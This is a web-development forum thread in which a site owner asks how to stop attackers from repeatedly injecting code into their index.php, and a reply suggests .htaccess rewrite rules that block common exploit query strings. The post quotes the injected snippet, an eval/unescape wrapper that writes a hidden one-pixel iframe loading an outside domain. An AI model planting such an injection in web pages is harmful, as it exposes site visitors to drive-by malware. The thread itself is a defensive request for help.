Welcome Guest, Not a member yet? Register   Sign In
how can i prevent index.php page from hacking???
#1

[eluser]Unknown[/eluser]
somebody's adding this code to my index.php page

[removed]eval(unescape('[removed]('<iframe src="http://sienhu.com/?1271312" width=1 height=1></iframe>')'));[removed]<!-- uy7gdr5332rkmn -->

and this causes error during execution of site !!!!!!!!

how can i solve this problem permanently?
please help me !!!!!!!
#2

[eluser]InsiteFX[/eluser]
You can try adding these to your .htaccess file were index.php is.

Code:
# Add to your .htaccess file!

# Rewrite rules to block out some common exploits.
# If you are experience problems on your site block out the operations listed below
# attempts to block the most common type of exploit attempts!

# Block out any script trying to set a mosConfig value through the URL.
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\=) [OR]

# Block out any script trying to use base64_encode crap to send via URL.
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]

# Block out any script that includes a [removed] tag in the URL.
RewriteCond %{QUERY_STRING} (\<|<).*script.*(\>|>) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# Block all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]

InsiteFX




Theme © iAndrew 2016 - Forum software by © MyBB